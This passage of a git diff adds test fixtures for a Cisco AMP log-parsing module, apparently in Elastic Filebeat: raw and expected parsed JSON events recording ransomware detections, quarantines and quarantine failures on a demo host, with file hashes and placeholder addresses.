Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json new file mode 100644 index 00000000000..2dcd9193111 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json @@ -0,0 +1,2425 @@ +[ + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847664", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847663", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 1193, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847662", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 2379, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847661", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 3572, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847659", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 4765, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847657", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 5950, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229331435814973", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 572000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 7136, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 120000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 8409, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 1008, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229331435814970", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 73000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 9938, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229331435814968", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 26000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 11210, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847660", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 12488, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847658", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 13608, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14728, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229327140847671", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 870000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 15848, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419229327140847666", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 17121, + "process.hash.md5": "ad7b9c14083b52bc532fba5948342b98", + "process.hash.sha1": "ee8cbf12d87c4d388f09b4f69bed2e91682920b5", + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "process.name": "cmd.exe", + "process.pid": 5748, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + 